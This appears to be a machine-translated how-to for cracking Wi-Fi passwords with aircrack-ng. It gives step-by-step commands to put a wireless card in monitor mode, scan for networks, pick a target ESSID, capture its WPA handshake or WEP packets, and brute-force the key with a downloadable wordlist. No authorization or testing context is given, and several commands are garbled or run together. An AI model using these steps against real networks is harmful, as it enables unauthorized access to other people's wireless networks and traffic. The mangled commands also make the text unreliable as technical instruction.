Aircrack-ng wireless cracking summary, aircrack-ng

Aircrack-ng wireless cracking summary, aircrack-ng
In linux, I use the ubuntu environment. For ubuntu installation, you can directly use sudo apt-get install aircrack-ng

Linux should be able to use yum-y install aircrack-ng for installation. If its installation package does not have fangqian, It is very slow.

Bytes ------------------------------------------------------------------------------------

Method:

1. Make sure that your wireless connection is Enabled: ifconfig checks whether wlan0 is enabled or other wireless adapters are enabled. If not, the subsequent steps cannot be performed.

You can use ifconfig-a to check whether there is a wireless adapter, and then run the ifconfig wlan0 up command to start the wireless adapter (wlan0 is the name of the wireless adapter found in ifconfig-)

2. Enable the NIC to be in the listening mode:

sudo airmon-ng start wlan0

3. view the wireless network and capture wireless data packets.

sudo airodump-ng mon0 

Note: Here, mon0 is the alias after your wlan starts listening. Generally, the following problems may occur:

rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network

If this problem occurs, follow this to solve it.

sudo ifconfig wlan0 downsudo iwconfig wlan0 mode monitorsudo ifconfig wlan0 upsudo airodump-ng wlan0

Or:

airmon-ng check killairmon-ng start <interface>airodump-ng wlan0mon

However, network management is disabled.

Sudo servicenetwork-manager stop # stop the nm service udo servicenetwork-manager start # enable the nm Service

If everything is okay ====

The wireless signal that you can search for is displayed. PWR indicates the signal value. A larger value indicates the stronger the signal, and ESSID indicates the signal name. ENC is the encryption method (WEP is the easiest way to crack, wpa and wpa2 can only crack brute force)

Find an essid you want to crack

4. After determining the target

sudo airodump-ng -c 6 --bssid target's MAC -w file mon0

-C 6 refers to the channel of the signal, which is CH.

Target's MAC is the MAC address you want to crack

File is the data stored after aircrack-ng shakes hands with the target address.

5. After receiving enough packets (that is, data), start cracking.

sudo aircrack-ng file-01.cap

File-01.cap is the data stored after HandShaking

If it is a wep-type password, it can be cracked directly after receiving enough packets (1 w)

For wpa/wpa2 type encryption, you must receive the handshake packet before you can start brute force cracking and use the password file (given an address: http://static.hackersgarage.com/darkc0de.lst.gz) if the password is complex enough, such a password file is not enough. You need to encrypt the file more complex by yourself.

sudo aircrack-ng -w dic file-01.cap

The password can be obtained after successful cracking.